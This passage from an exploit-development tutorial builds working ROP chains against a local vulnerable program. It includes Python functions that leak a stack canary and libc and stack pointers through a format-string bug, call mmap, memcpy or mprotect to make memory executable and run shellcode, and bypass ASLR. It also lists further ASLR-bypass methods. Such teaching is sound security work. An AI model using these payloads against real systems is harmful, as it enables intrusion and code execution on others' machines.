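print("READ_IMPLIES_EXEC set:", None if persona is None else implies_exec(persona))
```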

One effective method is to map new memory with execute permissions, then move the malicious instructions to that memory and redirect the execution flow of the program to execute those instructions. In Windows, there are several low-level APIs that help with this, such as VirtualAlloc, NtAllocateVirtualMemory, WriteProcessMemory, and NtWriteVirtualMemory. On the other hand, Unix-based systems have functions that do the same thing, such as mmap. Let’s follow this approach in developing our own exploit.

We need to build a ROP chain that does exactly the following:

pExecutableMemory = mmap( NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0 );
memcpy( pExecutableMemory, pShellcode, ulShellSize );
((void (*)(void))pExecutableMemory)(); // jmp/call pExecutableMemory
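For intuition, the same three steps can be reproduced from inside a Python process on x86-64 Linux: map an anonymous RWX page, copy machine code into it, and call it. The following is a minimal sketch. It assumes the platform allows RWX anonymous mappings, and the six bytes are a hypothetical stand-in for shellcode that simply returns 42. The helper name run_from_fresh_mapping is hypothetical.

```python
import ctypes
import mmap
import platform
import sys

CODE = b"\xb8\x2a\x00\x00\x00\xc3"   # mov eax, 42 ; ret

def run_from_fresh_mapping(code: bytes):
    """mmap an RWX page, copy code into it, and call it; None off x86-64 Linux or if RWX is denied.
    The mapping is released once page and anchor are garbage-collected."""
    if not (sys.platform.startswith("linux") and platform.machine() == "x86_64"):
        return None
    try:
        # mmap(NULL, PAGESIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0)
        page = mmap.mmap(-1, mmap.PAGESIZE,
                         flags=mmap.MAP_SHARED | mmap.MAP_ANONYMOUS,
                         prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
    except OSError:                                    # e.g. a hardened policy forbids RWX memory
        return None
    page.write(code)                                   # memcpy(page, code, len(code))
    anchor = ctypes.c_char.from_buffer(page)           # exposes the page's address to ctypes
    func = ctypes.CFUNCTYPE(ctypes.c_int)(ctypes.addressof(anchor))
    return func()                                      # call page

print(run_from_fresh_mapping(CODE))
```

On x86-64 Linux this should print 42. The exploit's ROP chain performs exactly these operations, but inside the target process and without any cooperation from it.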

The mmap declaration is exactly as follows:

void *mmap(void addr[.length], size_t length, int prot, int flags, int fd, off_t offset);

It takes the following parameters:

  1. addr: The preferred starting address for the new mapping, or NULL to let the kernel choose one.
  2. length: The length of the mapping.
  3. prot: The desired access protection, such as PROT_READ, PROT_WRITE, and PROT_EXEC.
  4. flags: This determines whether updates to the mapping are visible to other processes mapping the same region, and whether updates are carried through to the underlying file.
  5. fd: The file descriptor (ignored when the MAP_ANONYMOUS flag is used, although portable code passes -1).
  6. offset: The offset into fd at which the mapping starts (should be zero when using the MAP_ANONYMOUS flag).

Reminder: according to the x64 Linux calling convention, the first six arguments of a function call are passed in registers in this order: rdi, rsi, rdx, rcx, r8, r9. Raw system calls use r10 instead of rcx, but here we are calling the libc function. So, to call mmap, we need to build a ROP chain that does the following:

  1. We have to set rdi to NULL. I couldn't find either a mov rdi, 0; ret or an xor rdi, rdi; ret gadget, so the alternative is pop rdi; ret with zeros on the stack immediately after the gadget. \x00 is not a bad byte for the vulnerable program, so this is not a problem.
  2. The rsi register must be set to the appropriate size, for example 0x1000 (one memory page). The pop rsi; ret gadget is convenient for this.
  3. The rdx register must be set to the desired protections (PROT_EXEC|PROT_READ|PROT_WRITE); we'll use pop rdx; ret for that.
  4. The rcx register must be set to the desired flags (MAP_ANONYMOUS|MAP_SHARED); we'll use pop rcx; add eax, 0x1734ba; ret for that. This gadget changes eax, but we don't care about eax at this point, so that's fine.
  5. Register r8 needs to be set to -1, which is 0xffffffffffffffff as a 64-bit value, so we'll write this to the stack and retrieve it with the pop r8; ret gadget.
  6. The last parameter is zero, so r9 should be set to zero. At this point it already holds zero, so we don't have to do anything with it.
  7. The mmap address must be placed as a return address so that mmap is called once all its parameters have been set.
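Every argument above follows the same "pop <reg>; ret" pattern, so this part of the chain can be generated from a table of gadget addresses. The following is a minimal sketch with a hypothetical helper, call_chain. It assumes each gadget pops exactly one value and that any remaining argument registers (here r9) already hold the right value. With the gadget addresses used in this post, it produces the same bytes as the mmap portion of the payload in the next hijack_exec.

```python
import struct

SYSV_ARG_REGS = ("rdi", "rsi", "rdx", "rcx", "r8", "r9")   # System V AMD64 argument order

def call_chain(func_addr: int, args, pop_gadgets: dict) -> bytes:
    """Load args into the SysV argument registers via 'pop <reg>; ret' gadgets, then return into func_addr."""
    if len(args) > len(SYSV_ARG_REGS):
        raise ValueError("only register arguments are supported in this sketch")
    chain = b""
    for reg, value in zip(SYSV_ARG_REGS, args):
        chain += struct.pack("<Q", pop_gadgets[reg])             # pop <reg>; ret
        chain += struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)   # value to pop (-1 -> 0xff..ff)
    return chain + struct.pack("<Q", func_addr)                  # final 'ret' enters the function

POP_GADGETS = {
    "rdi": 0x7ffff7dd8205,   # pop rdi; ret
    "rsi": 0x7ffff7dd9b39,   # pop rsi; ret
    "rdx": 0x7ffff7ebb37d,   # pop rdx; ret
    "rcx": 0x7ffff7ded94c,   # pop rcx; add eax, 0x1734ba; ret
    "r8":  0x7ffff7fd9efb,   # pop r8; ret
}
MMAP = 0x7ffff7eba9a0

# mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, r9 assumed 0)
mmap_part = call_chain(MMAP, (0, 0x1000, 0x7, 0x01 | 0x20, -1), POP_GADGETS)
print(len(mmap_part) // 8, "stack slots")
```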

The next step is to copy our malicious code into the memory allocated by mmap, using the memcpy function. memcpy is declared as follows:

void *memcpy(void dest[restrict .n], const void src[restrict .n], size_t n);

It takes exactly three parameters:

  1. dest: The destination memory address to copy to.
  2. src: The source memory address to copy from.
  3. n: The number of bytes to copy.

To do this we must complete our ROP chain as follows:

  1. The rdi register needs to be set to the address of the new mapping, which mmap returns in rax. Unfortunately, I couldn't find an appropriate gadget that moves rax into rdi, such as mov rdi, rax; ret or push rax; pop rdi; ret. But thank God, I managed to find a gadget that swaps them: xchg rdi, rax; cld; ret;.
  2. The rsi register needs to be set to the shellcode address, which is on the stack. The pop rsi; ret gadget always comes to the rescue.
  3. The rdx register needs to be set to the shellcode size, and as before we'll use pop rdx; ret.
  4. The memcpy address must be placed as a return address so that it gets executed.

Now everything is in place, and we just need to jump into that executable memory to run our shellcode. In this case, the rdi register still holds the executable memory address (the memcpy destination) when memcpy returns. Note that rdi is a caller-saved register, so this depends on the memcpy implementation; only rax is guaranteed to hold the destination, as memcpy's return value.

We therefore need a gadget like jmp rdi or call rdi. The shellcode will kill the process, so we don't care whether control flow is lost. Instead, I found an alternative gadget: push rdi; adc al, 0x48; lea eax, [rdi + 0x15]; ret;. It pushes the shellcode's executable address onto the stack, adds 0x48 plus the carry flag to al, and loads rdi + 0x15 into eax. Those side effects are harmless here. When the gadget returns, ret pops the address that push just placed, so execution continues in our shellcode.

def hijack_exec(p: Popen, canary):
    shellcode = 0x7fffffffddb0  + 0x40                    # Shellcode Address

    payload = b""
    payload += b"A" * 0x112                               # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", 0x7ffff7dd8205 )        # pop rdi; ret
    payload += b"\x00" * 0x8                              # addr = NULL
    payload += struct.pack( "<Q", 0x7ffff7dd9b39 )        # pop rsi; ret
    payload += struct.pack( "<Q", 0x1000 )                # Page size 
    payload += struct.pack( "<Q", 0x7ffff7ebb37d )        # pop rdx; ret
    payload += struct.pack( "<Q", 0x01 | 0x02 | 0x04 )    # Protections: PROT_READ=0x01, PROT_WRITE=0x02, PROT_EXEC=0x04
    payload += struct.pack( "<Q", 0x7ffff7ded94c )        # pop rcx; add eax, 0x1734ba; ret;
    payload += struct.pack( "<Q", 0x01 | 0x20 )           # flags: MAP_SHARED=0x01 MAP_ANONYMOUS=0x20
    payload += struct.pack( "<Q", 0x7ffff7fd9efb )        # pop r8; ret
    payload += b"\xff" * 0x8                              # fd = -1
    payload += struct.pack( "<Q", 0x7ffff7eba9a0 )        # mmap( NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0 )
    
    payload += struct.pack( "<Q", 0x7ffff7f288a1 )        # xchg rdi, rax; cld; ret;
    payload += struct.pack( "<Q", 0x7ffff7dd9b39 )        # pop rsi; ret
    payload += struct.pack( "<Q", shellcode )             # Shellcode address
    payload += struct.pack( "<Q", 0x7ffff7ebb37d )        # pop rdx; ret
    payload += struct.pack( "<Q", len(buf) + 0x40 )       # Shellcode size for memcpy
    payload += struct.pack( "<Q", 0x7ffff7feb6e0 )        # memcpy( exec_mem, shellcode, shellsize )

    # Execute the shellcode
    payload += struct.pack( "<Q", 0x7ffff7e5ce42 )        # push rdi; adc al, 0x48; lea eax, [rdi + 0x15]; ret;
    
    payload += b"\x90" * 0x40                             # NOPs for padding
    payload += buf                                        # Shellcode

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

Let’s fire:

Address Space Layout Randomization ( ASLR )

Most of the exploit strategies we've used so far rely on fixed, known addresses: the shellcode address on the stack, the locations of critical data like the canary we leak, and the addresses of ROP gadgets. Without knowing these addresses, the exploit fails completely. This protection is designed to kill this approach.

ASLR randomizes the base address of the executable when the program is loaded into memory (if it is built as a position-independent executable, PIE). It also randomizes the locations of the loaded libraries, the stack, and the heap. So even if an attacker gains control over the execution flow (for example, by controlling the instruction pointer), the location of the code to execute, the addresses of the ROP gadgets, and everything else the exploit needs are unknown.

To understand exactly how this protection works, we first need to know how operating systems manage memory and the considerations behind it. In fact, the addresses we see and interact with during debugging are not physical memory addresses but virtual memory addresses. I'll explain why operating systems work this way and what the benefits are.

Physical memory is limited compared to the demands of users who run numerous programs simultaneously, let alone servers that serve thousands or millions of clients. The available RAM simply cannot hold all of that at once. Furthermore, RAM is expensive, not only financially, but also because adding more of it affects other aspects such as energy consumption and overall computer performance. Virtual memory came to solve these problems.

Virtual memory can be defined as a memory management method in which the operating system simulates a memory larger than physical memory. It lets programs larger than physical memory run by loading only part of their data into physical memory at a time. The hard disk stores data that is not currently in use, and when that data is needed, the memory manager swaps it into physical memory. To keep track of the data and its actual locations, the memory manager builds a mapping table. This table maps virtual addresses to the corresponding physical addresses and records additional information, such as which virtual addresses belong to which process. Have you ever noticed that the same addresses appear in different processes running at the same time?

(Figure source: Operating System Concepts book, chapter 9)

This mapping table (the page table) plays a vital role: it lets the operating system translate virtual addresses into physical addresses whenever a process accesses them. The operating system works together with the memory management unit (MMU) in the CPU to perform this translation. Since each process has its own page table, different processes can use the same virtual addresses without colliding.

Normally, when ASLR is disabled, the operating system maps a process's components at fixed virtual addresses. When it is enabled, the operating system picks random ranges every time the program runs. Either way, the page table lets the memory manager translate these virtual addresses into physical addresses; to it, they are just numbers. I would like to point out that where data lands in physical memory is effectively arbitrary whether ASLR is enabled or not, and it differs every time the program runs. ASLR is purely about randomizing the virtual address layout.
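On Linux, the system-wide ASLR setting lives in /proc/sys/kernel/randomize_va_space:

* 0: disabled.
* 1: the stack, the mmap base (and therefore shared libraries), and the vDSO are randomized.
* 2: the heap (brk) is randomized as well.

Each process's current layout is visible in /proc/<pid>/maps. The following is a minimal sketch that reads the setting and extracts a module's base address from a maps listing. Matching libc by the substring "libc.so" is an assumption that holds for typical glibc installs. The helper names are hypothetical.

```python
import re
import sys

ASLR_MODES = {0: "disabled", 1: "conservative (stack, mmap, vDSO)", 2: "full (also heap/brk)"}
MAPS_LINE = re.compile(r"^([0-9a-f]+)-[0-9a-f]+ \S+ \S+ \S+ \S+\s+(\S+)$", re.M)

def aslr_mode():
    """Read the system-wide ASLR setting; None if unavailable (e.g. not on Linux)."""
    try:
        with open("/proc/sys/kernel/randomize_va_space") as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None

def module_base(maps_text: str, name: str = "libc.so"):
    """Lowest start address among the mappings whose path contains name."""
    starts = [int(m.group(1), 16) for m in MAPS_LINE.finditer(maps_text) if name in m.group(2)]
    return min(starts) if starts else None

if sys.platform.startswith("linux"):
    mode = aslr_mode()
    print("randomize_va_space =", mode, ASLR_MODES.get(mode, "unknown"))
    with open("/proc/self/maps") as f:
        base = module_base(f.read())
    print("libc base in this process:", hex(base) if base else "not found")
```

Running it a few times with ASLR enabled should print a different libc base on each run. With randomize_va_space set to 0, the base should stay the same.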

Defeating ASLR

Yes, this protection makes things more difficult and makes exploitation more complex, especially when used in conjunction with the other protections mentioned above. However, there is still a lot we can do to bypass this protection. One strategy is to leak the required addresses using any memory disclosure bug or other techniques so we can defeat the randomization and circumvent the protection. To build our ROP chain, we only need a single address belonging to the module/library. From this address, we can calculate the base address of the module and also all the required ROP gadgets.

As shown in the image, there are values on the stack pointing into libc, as well as one pointing into the stack itself. We need to leak these addresses to dynamically calculate the addresses of the ROP gadgets we need, as well as the shellcode address. So, we need to update our leak_canary function to leak these addresses too, and rename it to something more appropriate, such as leak_stuff.

def leak_stuff(p: Popen):
    # Leak three stack slots through the format string bug:
    # %49$p = canary, %51$p = a pointer into libc, %67$p = a pointer into the stack
    p.stdin.write( b"1\n" + b"%49$p %51$p %67$p\n" + b"2\n" )
    p.stdin.flush()

    # Read output lines (up to 1024) until the one containing the leaked values
    for _ in range( 1024 ):
        out = p.stdout.readline()
        pos = out.find( b"0x" )
        if pos != -1:
            break
    else:
        return [ -1 ] * 3

    # The values are separated by whitespace; int() accepts the "0x" prefix with base 16
    return [ int(tok, 16) for tok in out[pos:].split()[:3] ]

After leaking them, we need to modify the hijack_exec function, giving it the C library base address and the shellcode address as arguments. But first, we need to calculate the information we need from these leaked addresses.

(gdb) p/x 0x7ffff7dd7d68-0x00007ffff7dae000
$1 = 0x29d68

Subtracting libc's base address from the leaked libc pointer gives this constant offset. Therefore, at runtime, we subtract this offset from the leaked address to get the library's base address.

(gdb) p/x 0x7fffffffde98-(0x7fffffffddb0+0x40)
$2 = 0xa8

Subtracting the shellcode address from the leaked stack pointer gives this constant distance. Therefore, at runtime, we subtract this distance from the leaked address to get the shellcode address.
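These two calculations can be captured in a small helper. ASLR works at page granularity, so the low 12 bits of a correctly computed base address are always zero. That makes a cheap sanity check against a wrong leak index or offset. The following is a minimal sketch using the constants measured above; they depend on this particular binary and libc build. The leaked libc value 0x7ffff7dd7d68 is the address right after call *%rax in __libc_start_call_main shown earlier, that is, main's return address. The helper name derive_addresses is hypothetical.

```python
LIBC_LEAK_OFFSET = 0x29d68    # leaked libc pointer (main's return address) - libc base
STACK_LEAK_OFFSET = 0xa8      # leaked stack pointer - shellcode address

def derive_addresses(libc_leak: int, stack_leak: int):
    """Turn the leaked pointers into (libc base, shellcode address)."""
    libc_base = libc_leak - LIBC_LEAK_OFFSET
    if libc_base & 0xfff:
        raise ValueError(f"libc base {libc_base:#x} is not page-aligned; check the leak/offset")
    return libc_base, stack_leak - STACK_LEAK_OFFSET

libc_base, shellcode = derive_addresses(0x7ffff7dd7d68, 0x7fffffffde98)
print(hex(libc_base), hex(shellcode))  # 0x7ffff7dae000 0x7fffffffddf0
```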

def hijack_exec(p: Popen, canary, libc_base, shellcode):
    stack_page = shellcode & 0xfffffffffffff000           # Align the address to the page boundary.
    payload = b""
    payload += b"A" * 0x106                               # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", libc_base + 0x2a205 )   # pop rdi; ret
    payload += struct.pack( "<Q", stack_page )            # The aligned stack page address
    payload += struct.pack( "<Q", libc_base + 0x2bb39 )   # pop rsi; ret
    payload += struct.pack( "<Q", 0x1000 )                # Page size 
    payload += struct.pack( "<Q", libc_base + 0x10d37d )  # pop rdx; ret
    payload += struct.pack( "<Q", 0x01 | 0x02 | 0x04 )    # Protections: PROT_READ=0x01, PROT_WRITE=0x02, PROT_EXEC=0x04
    payload += struct.pack( "<Q", libc_base + 0x10d200 )  # mprotect function address
    payload += struct.pack( "<Q", shellcode )             # Jump into shellcode
    payload += b"\x90" * 0x40                             # NOPs for padding
    payload += buf                                        # Shellcode

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

Now, this function can efficiently calculate all the required ROP gadgets addresses dynamically based on their relative virtual addresses (RVA) to the Libc base address. We now need to modify only two lines in the main function.

    canary, libc_relative_addr, stack_relative_addr = leak_stuff( p )

And

        hijack_exec( p, canary, libc_relative_addr-0x29d68, stack_relative_addr-0xa8 )

Now, everything is in order.
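One detail in hijack_exec deserves a second look: the chain makes exactly one page (0x1000 bytes) executable, starting at the page that contains the shellcode address. If the NOP sled and shellcode happen to straddle a page boundary, the tail stays non-executable and the process crashes. The sketch below is a hypothetical refactor, not the exploit’s own code. It keeps the gadget RVAs from hijack_exec in one table, rounds the mprotect range up so it covers the whole shellcode region, and takes the PROT_* values from Python’s mmap module, which assumes the attacking machine runs Linux like the target.

```python
import mmap
import struct

# RVAs copied from hijack_exec; they are only valid for the exact Libc build
# the exploit was written against.
LIBC_RVAS = {
    "pop_rdi": 0x2a205,   # pop rdi; ret
    "pop_rsi": 0x2bb39,   # pop rsi; ret
    "pop_rdx": 0x10d37d,  # pop rdx; ret
    "mprotect": 0x10d200,
}
PAGE_SIZE = 0x1000  # assumes 4 KiB pages, like the original chain


def page_span(addr: int, length: int) -> tuple[int, int]:
    """Return a page-aligned (start, size) pair covering [addr, addr + length)."""
    start = addr & ~(PAGE_SIZE - 1)
    end = (addr + length + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)
    return start, end - start


def mprotect_chain(libc_base: int, shellcode_addr: int, shellcode_len: int) -> bytes:
    """Hypothetical helper: ROP chain calling mprotect(start, size, RWX), then returning into the shellcode."""
    gadget = {name: libc_base + rva for name, rva in LIBC_RVAS.items()}
    start, size = page_span(shellcode_addr, shellcode_len)
    # mmap exposes the host's PROT_* values (Linux: READ=0x1, WRITE=0x2, EXEC=0x4),
    # so this only matches the target if both run Linux.
    rwx = mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC
    words = [
        gadget["pop_rdi"], start,   # 1st argument: page-aligned start address
        gadget["pop_rsi"], size,    # 2nd argument: length rounded up to whole pages
        gadget["pop_rdx"], rwx,     # 3rd argument: protection flags
        gadget["mprotect"],
        shellcode_addr,             # mprotect's ret lands here
    ]
    return b"".join(struct.pack("<Q", w) for w in words)


# A shellcode region straddling a page boundary needs two pages, not one.
print([hex(v) for v in page_span(0x7fffffffdfe0, 0x80)])  # ['0x7fffffffd000', '0x2000']
```

If you adopt something like this, `shellcode_len` should cover everything from the shellcode address to the end of `buf`; the canary, padding, and saved base pointer stay exactly as they are in hijack_exec.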

Notice that when we run the exploit with ASLR enabled (in its different modes), it still works despite the randomized addresses, as shown in the picture.
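If you want to repeat this test, it helps to confirm which mode the system is actually in. On Linux, the system-wide setting is exposed in /proc/sys/kernel/randomize_va_space: 0 disables ASLR, 1 randomizes the stack, the mmap base (and therefore shared libraries), and the vDSO, and 2 additionally randomizes the heap. The sketch below just reads and labels that value; the function names are illustrative, not part of the exploit.

```python
from pathlib import Path

ASLR_SYSCTL = Path("/proc/sys/kernel/randomize_va_space")

# Meaning of each value, per the Linux kernel's sysctl documentation.
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base (shared libraries) and vDSO randomized",
    2: "mode 1 plus heap (brk) randomization",
}


def parse_aslr_mode(text: str) -> int:
    """Parse the contents of randomize_va_space into an integer mode."""
    return int(text.strip())


def current_aslr_mode() -> int:
    """Read the system-wide ASLR mode (Linux only)."""
    return parse_aslr_mode(ASLR_SYSCTL.read_text())


if __name__ == "__main__" and ASLR_SYSCTL.exists():
    mode = current_aslr_mode()
    print(f"randomize_va_space = {mode}: {ASLR_MODES.get(mode, 'unknown')}")
```

Changing the mode between runs, for example with `sudo sysctl -w kernel.randomize_va_space=1`, and rerunning the exploit is a quick way to confirm that it no longer relies on fixed addresses.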

Other Bypassing Techniques

There are many techniques for bypassing and circumventing ASLR, and which one works depends on the targeted system’s nature, its functionality, and the environment in which it operates. The options are endless, but they require diligence and careful thinking. Here are some methods that can be used:

  1. Non-ASLR-aware Modules: Not all modules are compiled with ASLR support, especially on Windows. The operating system normally loads such a module at its preferred (fixed) base address, so its addresses stay the same across runs. This can be abused to build a stable ROP chain from its gadgets that helps us execute our code or do whatever we want.

  2. Low ASLR Entropy: Sometimes ASLR is implemented poorly and randomizes addresses with too little entropy, so only one or two bytes change while the rest remain constant. In this case, if we are targeting a local binary that can be run repeatedly, or a network service that is automatically restarted when it crashes, brute-forcing the randomized addresses becomes practical. If you think I am joking or that this bullshit is not feasible, let me tell you that even in 2025 we are still seeing such strategies used, as in the exploitation of CVE-2025-0282.
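Both ideas can be checked with a little Python. For the first, a Windows module opts into ASLR through the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag (0x0040) in the DllCharacteristics field of its PE optional header, so a module lacking that flag is a candidate for a stable ROP chain (unless its preferred base is already taken or mandatory ASLR is forced system-wide). For the second, if every attempt faces a freshly randomized layout with k bits of entropy, the chance of success after n attempts is 1 - (1 - 2^-k)^n. The helpers below are hypothetical sketches: `is_aslr_aware` does minimal PE parsing with only basic signature checks, and `attempts_for` assumes independent attempts with uniform randomization.

```python
import math
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # image can be relocated at load time (ASLR-aware)


def is_aslr_aware(pe: bytes) -> bool:
    """Return True if the PE image sets the DYNAMIC_BASE flag in DllCharacteristics."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)  # offset of the PE signature
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    optional_header = e_lfanew + 4 + 20  # skip the signature and the 20-byte COFF file header
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers.
    (dll_characteristics,) = struct.unpack_from("<H", pe, optional_header + 70)
    return bool(dll_characteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)


def attempts_for(entropy_bits: int, success_prob: float = 0.5) -> int:
    """Attempts n such that 1 - (1 - 2**-k)**n >= success_prob, assuming a fresh layout each try."""
    p = 2.0 ** -entropy_bits
    return math.ceil(math.log(1 - success_prob) / math.log(1 - p))


for bits in (8, 12, 16):
    print(bits, attempts_for(bits))
```

For example, with 8 bits of entropy, 178 attempts already give a 50% chance of success, which is trivial against a service that restarts itself after every crash. To check a real module, pass its raw bytes, e.g. `is_aslr_aware(open(path, "rb").read())`.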

Conclusion

The methods of circumventing various protections always depend primarily on the nature of the target, the environment in which it operates, its specific functionality, and many other factors of this kind. There is no magic method that will always allow you to bypass everything, whoever tells you otherwise. There are general ideas for bypassing each protection, but applying them is up to you: nothing will help you except your own experience and your technical and practical skills. A small detail in the program you are targeting, if used in a creative way, might be enough to bypass these protections. To improve your level and become able to develop your own creative exploitation strategies, you need to train and practice a lot. No one can develop complex and advanced exploits just by learning about such vulnerabilities and attacks without practice and facing many scenarios; that ability comes gradually as you encounter many scenarios and read about different exploits. So, I advise you to read a lot and to try building exploits for previously discovered vulnerabilities yourself. This will help you a lot and improve your level insanely.